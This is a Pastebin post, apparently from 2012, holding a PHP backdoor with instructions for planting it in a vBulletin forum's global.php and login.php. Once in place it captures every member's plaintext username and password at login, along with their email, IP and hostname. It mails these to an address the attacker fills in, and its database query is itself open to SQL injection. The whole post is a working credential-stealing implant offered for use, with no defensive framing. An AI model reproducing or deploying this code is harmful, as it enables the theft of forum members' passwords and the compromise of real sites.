Advertisement
Damane-Dz

How To Infect Vbulletin And Get Members Passwords ??

Oct 18th, 2012
1,106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.00 KB | None | 0 0
  1.  <?php
  2. // How To Infect Vbulletin And Get Members Passwords ?? :D
  3. // First Go To global.php File
  4. // Find $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING')
  5. // Add // To This Phrase >> Become Comment :p
  6. // Then Go To login.php File
  7. // Find process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
  8. // Add This Code After It
  9.  
  10. // Code StarT
  11.  
  12. $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
  13. $lg_password = $vbulletin->GPC["vb_login_password"];
  14. $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
  15. while($row = @mysql_fetch_array($sql_query))
  16. {
  17. if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
  18. {
  19. function curPageURL() {
  20.  $pageURL = 'http';
  21.  if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  22.  $pageURL .= "://";
  23.  if ($_SERVER["SERVER_PORT"] != "80") {
  24.   $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  25.  } else {
  26.   $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  27.  }
  28.  return $pageURL;
  29. }
  30. $url = curPageURL();
  31. $ip = getenv("REMOTE_ADDR");
  32. $hostname = gethostbyaddr($ip);
  33. $message  = "------------------+ VBulletin Account +-----------------\n";
  34. $message .= "Forum URL            : ".$url."\n";
  35. $message .= "UserName             : ".$lg_username."\n";
  36. $message .= "Password             : ".$lg_password."\n";
  37. $message .= "Email                : ". $row["email"] ."\n";
  38. $message .= "----------------------- By Damane-Dz --------------------------\n";
  39. $message .= "Client IP : ".$ip."\n";
  40. $message .= "HostName : ".$hostname."\n";
  41. $rnessage = "$message\n";
  42. $message .= "-------------------+ Created By Damane-Dz +--------------------\n";
  43. $send= "yourmail@mail.com";
  44. $subject = "$url | VBulletin Account | $ip";
  45. $headers = "From:VBulletin Account<VB@Rezult.CoM>";
  46. mail($send,$subject,$message,$headers);
  47. }
  48. }
  49.  
  50. // Finally Change yourmail@mail.com with your mail :$
  51.  
  52. // Done By Damane-Dz (Damane-Dz@hotmail.com)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement